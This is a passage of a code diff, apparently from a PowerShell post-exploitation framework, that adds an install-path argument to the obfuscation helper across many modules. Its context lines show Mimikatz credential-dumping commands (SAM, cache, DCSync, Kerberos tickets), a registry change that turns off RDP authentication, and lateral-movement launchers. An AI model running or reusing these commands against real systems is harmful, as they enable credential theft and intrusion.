a/lib/modules/powershell/credentials/mimikatz/cache.py +++ b/lib/modules/powershell/credentials/mimikatz/cache.py @@ -76,6 +76,6 @@ class Module: scriptEnd += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/certs.py b/lib/modules/powershell/credentials/mimikatz/certs.py index bc6cfa7..9bb7f87 100644 --- a/lib/modules/powershell/credentials/mimikatz/certs.py +++ b/lib/modules/powershell/credentials/mimikatz/certs.py @@ -73,6 +73,6 @@ class Module: # add in the cert dumping command scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """ if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/command.py b/lib/modules/powershell/credentials/mimikatz/command.py index 6fe1eaa..c5d8ab1 100644 --- a/lib/modules/powershell/credentials/mimikatz/command.py +++ b/lib/modules/powershell/credentials/mimikatz/command.py @@ -79,6 +79,6 @@ class Module: scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/dcsync.py b/lib/modules/powershell/credentials/mimikatz/dcsync.py index c5c9305..4f725b9 100644 --- a/lib/modules/powershell/credentials/mimikatz/dcsync.py +++ b/lib/modules/powershell/credentials/mimikatz/dcsync.py @@ -100,6 +100,6 @@ class Module: scriptEnd += "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py b/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py index e622667..cd46e70 100644 --- a/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py +++ b/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py @@ -109,6 +109,6 @@ class Module: scriptEnd += "| Out-String;" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/extract_tickets.py b/lib/modules/powershell/credentials/mimikatz/extract_tickets.py index eec8576..33d9ea7 100644 --- a/lib/modules/powershell/credentials/mimikatz/extract_tickets.py +++ b/lib/modules/powershell/credentials/mimikatz/extract_tickets.py @@ -72,6 +72,6 @@ class Module: scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/golden_ticket.py b/lib/modules/powershell/credentials/mimikatz/golden_ticket.py index 4370568..3a9da38 100644 --- a/lib/modules/powershell/credentials/mimikatz/golden_ticket.py +++ b/lib/modules/powershell/credentials/mimikatz/golden_ticket.py @@ -150,6 +150,6 @@ class Module: scriptEnd += " /ptt\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/logonpasswords.py b/lib/modules/powershell/credentials/mimikatz/logonpasswords.py index 9bcc167..b8f0d6e 100644 --- a/lib/modules/powershell/credentials/mimikatz/logonpasswords.py +++ b/lib/modules/powershell/credentials/mimikatz/logonpasswords.py @@ -78,6 +78,6 @@ class Module: if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/lsadump.py b/lib/modules/powershell/credentials/mimikatz/lsadump.py index 94692fb..6fab658 100644 --- a/lib/modules/powershell/credentials/mimikatz/lsadump.py +++ b/lib/modules/powershell/credentials/mimikatz/lsadump.py @@ -86,6 +86,6 @@ class Module: scriptEnd += "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/mimitokens.py b/lib/modules/powershell/credentials/mimikatz/mimitokens.py index 23020b4..afa5f63 100644 --- a/lib/modules/powershell/credentials/mimikatz/mimitokens.py +++ b/lib/modules/powershell/credentials/mimikatz/mimitokens.py @@ -137,6 +137,6 @@ class Module: scriptEnd += "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/pth.py b/lib/modules/powershell/credentials/mimikatz/pth.py index 423969f..6da1a65 100644 --- a/lib/modules/powershell/credentials/mimikatz/pth.py +++ b/lib/modules/powershell/credentials/mimikatz/pth.py @@ -126,6 +126,6 @@ class Module: scriptEnd += ';"`nUse credentials/token to steal the token of the created PID."' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/purge.py b/lib/modules/powershell/credentials/mimikatz/purge.py index edac4ea..834d804 100644 --- a/lib/modules/powershell/credentials/mimikatz/purge.py +++ b/lib/modules/powershell/credentials/mimikatz/purge.py @@ -74,6 +74,6 @@ class Module: # set the purge command scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/sam.py b/lib/modules/powershell/credentials/mimikatz/sam.py index 2d229fb..4672a4c 100644 --- a/lib/modules/powershell/credentials/mimikatz/sam.py +++ b/lib/modules/powershell/credentials/mimikatz/sam.py @@ -76,6 +76,6 @@ class Module: scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/silver_ticket.py b/lib/modules/powershell/credentials/mimikatz/silver_ticket.py index 47187f9..0deb85c 100644 --- a/lib/modules/powershell/credentials/mimikatz/silver_ticket.py +++ b/lib/modules/powershell/credentials/mimikatz/silver_ticket.py @@ -162,6 +162,6 @@ class Module: scriptEnd += " /ptt\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/trust_keys.py b/lib/modules/powershell/credentials/mimikatz/trust_keys.py index c216a2a..720cf4e 100644 --- a/lib/modules/powershell/credentials/mimikatz/trust_keys.py +++ b/lib/modules/powershell/credentials/mimikatz/trust_keys.py @@ -80,6 +80,6 @@ class Module: else: scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/powerdump.py b/lib/modules/powershell/credentials/powerdump.py index 2abe750..caba57a 100644 --- a/lib/modules/powershell/credentials/powerdump.py +++ b/lib/modules/powershell/credentials/powerdump.py @@ -70,6 +70,6 @@ class Module: scriptEnd = "Invoke-PowerDump" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/sessiongopher.py b/lib/modules/powershell/credentials/sessiongopher.py index c7acc1b..ee707d1 100644 --- a/lib/modules/powershell/credentials/sessiongopher.py +++ b/lib/modules/powershell/credentials/sessiongopher.py @@ -136,6 +136,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/tokens.py b/lib/modules/powershell/credentials/tokens.py index f79785f..06761f3 100644 --- a/lib/modules/powershell/credentials/tokens.py +++ b/lib/modules/powershell/credentials/tokens.py @@ -155,6 +155,6 @@ class Module: if self.options['RevToSelf']['Value'].lower() != "true": scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/vault_credential.py b/lib/modules/powershell/credentials/vault_credential.py index ab983b6..07623da 100644 --- a/lib/modules/powershell/credentials/vault_credential.py +++ b/lib/modules/powershell/credentials/vault_credential.py @@ -73,6 +73,6 @@ class Module: scriptEnd = "Get-VaultCredential" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/exfiltration/egresscheck.py b/lib/modules/powershell/exfiltration/egresscheck.py index 02d56e5..902c19d 100644 --- a/lib/modules/powershell/exfiltration/egresscheck.py +++ b/lib/modules/powershell/exfiltration/egresscheck.py @@ -119,6 +119,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/exploitation/exploit_jboss.py b/lib/modules/powershell/exploitation/exploit_jboss.py index 3cf9645..5fe2b02 100644 --- a/lib/modules/powershell/exploitation/exploit_jboss.py +++ b/lib/modules/powershell/exploitation/exploit_jboss.py @@ -110,6 +110,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/exploitation/exploit_jenkins.py b/lib/modules/powershell/exploitation/exploit_jenkins.py index d811188..9d97fd5 100644 --- a/lib/modules/powershell/exploitation/exploit_jenkins.py +++ b/lib/modules/powershell/exploitation/exploit_jenkins.py @@ -95,6 +95,6 @@ class Module: scriptEnd += " -Cmd " + command if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/inveigh_relay.py b/lib/modules/powershell/lateral_movement/inveigh_relay.py index 396aa44..93c4982 100644 --- a/lib/modules/powershell/lateral_movement/inveigh_relay.py +++ b/lib/modules/powershell/lateral_movement/inveigh_relay.py @@ -193,6 +193,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_dcom.py b/lib/modules/powershell/lateral_movement/invoke_dcom.py index ba766c3..76b28d7 100644 --- a/lib/modules/powershell/lateral_movement/invoke_dcom.py +++ b/lib/modules/powershell/lateral_movement/invoke_dcom.py @@ -131,6 +131,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py b/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py index cdafed5..519124d 100644 --- a/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py +++ b/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py @@ -185,6 +185,6 @@ class Module: scriptEnd += " | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_psexec.py b/lib/modules/powershell/lateral_movement/invoke_psexec.py index ca5fb57..c8f81c1 100644 --- a/lib/modules/powershell/lateral_movement/invoke_psexec.py +++ b/lib/modules/powershell/lateral_movement/invoke_psexec.py @@ -146,6 +146,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_psremoting.py b/lib/modules/powershell/lateral_movement/invoke_psremoting.py index e238d20..2f7879b 100644 --- a/lib/modules/powershell/lateral_movement/invoke_psremoting.py +++ b/lib/modules/powershell/lateral_movement/invoke_psremoting.py @@ -136,5 +136,5 @@ class Module: script += ";'Invoke-PSRemoting executed on " +computerNames +"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py index 316cae5..2bfdbd2 100644 --- a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py +++ b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py @@ -132,6 +132,6 @@ class Module: if password != "": scriptEnd += " -Password "+password if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_sshcommand.py b/lib/modules/powershell/lateral_movement/invoke_sshcommand.py index 7cef7e8..0464e0b 100644 --- a/lib/modules/powershell/lateral_movement/invoke_sshcommand.py +++ b/lib/modules/powershell/lateral_movement/invoke_sshcommand.py @@ -123,6 +123,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_wmi.py b/lib/modules/powershell/lateral_movement/invoke_wmi.py index 23e5fb5..db318bc 100644 --- a/lib/modules/powershell/lateral_movement/invoke_wmi.py +++ b/lib/modules/powershell/lateral_movement/invoke_wmi.py @@ -145,5 +145,5 @@ class Module: script += ";'Invoke-Wmi executed on " +computerNames +"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py b/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py index afbd7b0..f7508a3 100644 --- a/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py +++ b/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py @@ -187,6 +187,6 @@ class Module: script += ";'Invoke-Wmi executed on " +computerNames + statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/lateral_movement/jenkins_script_console.py b/lib/modules/powershell/lateral_movement/jenkins_script_console.py index 16b49e4..cb70a24 100644 --- a/lib/modules/powershell/lateral_movement/jenkins_script_console.py +++ b/lib/modules/powershell/lateral_movement/jenkins_script_console.py @@ -121,6 +121,6 @@ class Module: scriptEnd += " -Port "+str(self.options['Port']['Value']) scriptEnd += " -Cmd \"" + launcher + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py b/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py index cd01e68..3202f92 100644 --- a/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py +++ b/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py @@ -162,5 +162,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/disable_rdp.py b/lib/modules/powershell/management/disable_rdp.py index 3cb332a..dd368c7 100644 --- a/lib/modules/powershell/management/disable_rdp.py +++ b/lib/modules/powershell/management/disable_rdp.py @@ -55,5 +55,5 @@ class Module: # command to enable NLA only if the enable runs successfully script += " if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/downgrade_account.py b/lib/modules/powershell/management/downgrade_account.py index a711b0f..3d385df 100644 --- a/lib/modules/powershell/management/downgrade_account.py +++ b/lib/modules/powershell/management/downgrade_account.py @@ -100,5 +100,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/enable_multi_rdp.py b/lib/modules/powershell/management/enable_multi_rdp.py index 1db6588..b3eb8d1 100644 --- a/lib/modules/powershell/management/enable_multi_rdp.py +++ b/lib/modules/powershell/management/enable_multi_rdp.py @@ -73,6 +73,6 @@ class Module: scriptEnd = "Invoke-Mimikatz -Command '\"ts::multirdp\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/enable_rdp.py b/lib/modules/powershell/management/enable_rdp.py index e7a27a5..4c45a8e 100644 --- a/lib/modules/powershell/management/enable_rdp.py +++ b/lib/modules/powershell/management/enable_rdp.py @@ -57,5 +57,5 @@ class Module: # command to disable NLA script += "$null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/get_domain_sid.py b/lib/modules/powershell/management/get_domain_sid.py index 1c10faa..61786bf 100644 --- a/lib/modules/powershell/management/get_domain_sid.py +++ b/lib/modules/powershell/management/get_domain_sid.py @@ -84,5 +84,5 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/honeyhash.py b/lib/modules/powershell/management/honeyhash.py index 575fd97..899b985 100644 --- a/lib/modules/powershell/management/honeyhash.py +++ b/lib/modules/powershell/management/honeyhash.py @@ -90,6 +90,6 @@ class Module: if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/invoke_script.py b/lib/modules/powershell/management/invoke_script.py index 1b0b4f4..f828e33 100644 --- a/lib/modules/powershell/management/invoke_script.py +++ b/lib/modules/powershell/management/invoke_script.py @@ -77,5 +77,5 @@ class Module: script += "%s" %(scriptCmd) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/lock.py b/lib/modules/powershell/management/lock.py index 9315a87..83b339d 100644 --- a/lib/modules/powershell/management/lock.py +++ b/lib/modules/powershell/management/lock.py @@ -87,5 +87,5 @@ Function Invoke-LockWorkStation { Invoke-LockWorkStation; "Workstation locked." """ if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/logoff.py b/lib/modules/powershell/management/logoff.py index 4508776..8eef8c3 100644 --- a/lib/modules/powershell/management/logoff.py +++ b/lib/modules/powershell/management/logoff.py @@ -62,5 +62,5 @@ class Module: else: script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/mailraider/disable_security.py b/lib/modules/powershell/management/mailraider/disable_security.py index 7bf6639..ebb3d86 100644 --- a/lib/modules/powershell/management/mailraider/disable_security.py +++ b/lib/modules/powershell/management/mailraider/disable_security.py @@ -110,6 +110,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/get_emailitems.py b/lib/modules/powershell/management/mailraider/get_emailitems.py index d7229cf..8a9f219 100644 --- a/lib/modules/powershell/management/mailraider/get_emailitems.py +++ b/lib/modules/powershell/management/mailraider/get_emailitems.py @@ -87,6 +87,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/get_subfolders.py b/lib/modules/powershell/management/mailraider/get_subfolders.py index e61c68d..46856a1 100644 --- a/lib/modules/powershell/management/mailraider/get_subfolders.py +++ b/lib/modules/powershell/management/mailraider/get_subfolders.py @@ -87,6 +87,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/mail_search.py b/lib/modules/powershell/management/mailraider/mail_search.py index 9494cfd..f0c85fe 100644 --- a/lib/modules/powershell/management/mailraider/mail_search.py +++ b/lib/modules/powershell/management/mailraider/mail_search.py @@ -112,6 +112,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/search_gal.py b/lib/modules/powershell/management/mailraider/search_gal.py index db46b09..971e4e9 100644 --- a/lib/modules/powershell/management/mailraider/search_gal.py +++ b/lib/modules/powershell/management/mailraider/search_gal.py @@ -107,6 +107,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/send_mail.py b/lib/modules/powershell/management/mailraider/send_mail.py index d25094f..e5733ad 100644 --- a/lib/modules/powershell/management/mailraider/send_mail.py +++ b/lib/modules/powershell/management/mailraider/send_mail.py @@ -117,6 +117,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/view_email.py b/lib/modules/powershell/management/mailraider/view_email.py index 3495c56..f162fda 100644 --- a/lib/modules/powershell/management/mailraider/view_email.py +++ b/lib/modules/powershell/management/mailraider/view_email.py @@ -92,6 +92,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/psinject.py b/lib/modules/powershell/management/psinject.py index 1c8c9da..cd22b64 100644 --- a/lib/modules/powershell/management/psinject.py +++ b/lib/modules/powershell/management/psinject.py @@ -133,6 +133,6 @@ class Module: else: scriptEnd += "Invoke-PSInject -ProcName %s 